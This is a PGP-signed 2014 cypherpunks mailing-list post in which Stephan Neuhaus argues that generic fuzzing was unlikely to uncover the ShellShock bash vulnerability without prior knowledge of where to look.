bashing your head against nation-state social engineering

Stephan Neuhaus stephan.neuhaus@tik.ee.ethz.ch
Fri Oct 3 23:54:40 PDT 2014


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 2014-10-03, 23:14, cyryl wrote:
> On 29/09/14 08:58, Stephan Neuhaus wrote:
>> On 2014-09-28 15:47, Subrosa.io wrote:
>>> I think this vulnerability should have been discovered with any
>>> kind of basic fuzzing.
>> 
>> If I understand the vulnerability correctly, it occurs in very
>> specific circumstances, namely trailing data at the end of a
>> function definition that's transported in an environment
>> variable.
>> 
>> In that case, I'd venture that *no* kind of "basic fuzzing" could
>> have uncovered this; the proportion of ShellShock-inducing
>> environment variable definitions among all possible environment
>> variables is simply too small.
>> 
>> What you would need instead is very specific syntax-directed
>> fuzzing, and even then I'm not sure that you have a decent chance
>> of discovering this without knowing already that it's there.
>> 
> 
> To uncover more vulns lcamtuf fed the fuzzer with the initial
> state, but then left it there to do the work.
> 
> http://lcamtuf.blogspot.nl/2014/10/bash-bug-how-we-finally-cracked.html

Without
> 
belittling the effort that's described in this article (after
all, they found more vulnerabilities, which is good), I stand by my
original point.  If you want to fuzz the whole of bash, your chances
of uncovering ShellShock are essentially nil.  Once you know that
function definitions transported in environment variables (a feature
that I didn't even know existed, and I've been working with bash since
the late 90's) are probably bug-ridden, your work becomes much, much
easier.

Fun,

Stephan
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (Darwin)

iQEcBAEBAgAGBQJUL5mlAAoJEE0T/LJL2oHTGxgIAKuBg2aFEesnrAd4qWiGEqfx
0E6SWWkJLkYEGD4gDcMQW5XVUUP45kJdINKZFd/rFY3Ep47VXHJ0zD89XrP4YVHH
+ujQMH4lF7+GLiVZ/tNYZCQ0k/t/9LBUS2bcvjuqIUxlmkzZN8UFFsD1L3/t+HDD
LBAmRi28Z4TOREOdHRga9BdpAKTHy7I4toHoiiA3x1psJxwkqr9WD8C7CLABWCeC
j6Gs1U5gqhCTOg0nz9DV8owuUJG1XqyOwApqC6hf1LZFWzr9WAR0G9Y+Xot4mdlJ
8s9Dkf9iEuN5nJpOPH9Hunhpoaxu8/B/TNYFvRYjE7zac3Icd8Hj3mu0TUc6RwY=
=8VXa
-----END PGP SIGNATURE-----



More information about the cypherpunks mailing list